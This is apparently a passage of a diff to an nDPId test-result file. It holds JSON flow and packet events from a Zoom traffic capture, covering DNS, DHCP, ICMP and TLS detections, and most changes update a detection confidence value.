00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569520469370,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1569520469370,"pkt":"KDc3AG3IEBMx8Tl2CABFAABrxSVAADUGFFlox0EqwKgBdQBQ0mtWiVxBp7jrIIAYACoMGQAAAQEICrPWHtMlnNsjzR67t55lmahUyt3+F7wIZY40kmp5z0B6VTx\/VJbCVWp7syOQaUpp1Ik5I7MknMnzBR1VLfTDBg=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569520469370,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520469370,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGzrXAqAF1aMdBKtJrAFCnuOsgVolceIAQD\/4OlAAAAQEICiWc2z+z1h7T"} 00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469423,"flow_last_seen":1569520469423,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469423,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1569520469423,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569520469423,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4WycAAEABlHPAqAF1ov8mDgMDkd4AAAAARQAAPMGVQAAuEf\/wov8mDsCoAXUNl11fACgAAA=="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469423,"flow_last_seen":1569520469423,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469423,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.182005} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469423,"flow_last_seen":1569520469423,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469423,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.182005} 
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1569520469433,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569520469433,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4ZPoAAEABiqDAqAF1ov8mDgMDkd4AAAAARQAAPMGZQAAuEf\/sov8mDsCoAXUNl11fACgAAA=="} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":90,"source":"zoom.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1569520469782} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":90,"source":"zoom.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1569520469435,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520469797,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00819{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1569520469797,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1569520469797,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzBkxAAEARcsXAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGABIog9sAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} -00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520469797,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}} 
+00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520469797,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469950,"flow_last_seen":1569520469950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520469950,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1569520469950,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520469950,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBQ3AqAF1NMo+xNZRAbvXiDKIAAAAALAC\/\/8cGAAAAgQFtAEDAwUBAQgKJZzdfwAAAAAEAgAA"} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469984,"flow_last_seen":1569520469984,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1569520469984,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1569520469984,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1569520469984,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA6vIgAAP8Re2PAqAF1wKgBAfYMADUAJtTToX0BAAABAAAAAAAABHd3dzMEem9vbQJ1cwAAAQAB"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469984,"flow_last_seen":1569520469984,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1569520469984,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"www3.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469984,"flow_last_seen":1569520469984,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1569520469984,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"www3.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1569520470021,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1569520470021,"pkt":"KDc3AG3IEBMx8Tl2CABFAABKWCQAADcRp7jAqAEBwKgBdQA19gwANiAtoX2BgAABAAEAAAAABHd3dzMEem9vbQJ1cwAAAQABwAwAAQABAAAAPAAENMo+7A=="} -00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469984,"flow_last_seen":1569520470021,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520470021,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": 
{"query":"www3.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.202.62.236"}} +00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469984,"flow_last_seen":1569520470021,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520470021,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"www3.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.202.62.236"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470022,"flow_last_seen":1569520470022,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470022,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1569520470022,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470022,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBOXAqAF1NMo+7NZSAbv67hZtAAAAALAC\/\/8UXQAAAgQFtAEDAwUBAQgKJZzdxgAAAAAEAgAA"} 
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569520470060,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470060,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO8GVhg0yj7EwKgBdQG71lFyHvWD14gyiYASaQOGlAAAAgQFrAEBBAIBAwMM"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569520470061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520470061,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBSXAqAF1NMo+xNZRAbvXiDKJch71hFAQIAAQZwAA"} -00835{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520469950,"flow_last_seen":1569520470086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470086,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
+00835{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520469950,"flow_last_seen":1569520470086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470086,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1569520470134,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470134,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO4GVvA0yj7swKgBdQG71lK89vcv+u4WboASaQMynAAAAgQFrAEBBAIBAwMM"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1569520470134,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520470134,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBP3AqAF1NMo+7NZSAbv67hZuvPb3MFAQIAC8bgAA"} 
-00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470022,"flow_last_seen":1569520470165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470165,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 
-01217{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} -00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01222{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 
+00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470022,"flow_last_seen":1569520470165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470165,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 
+01217{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 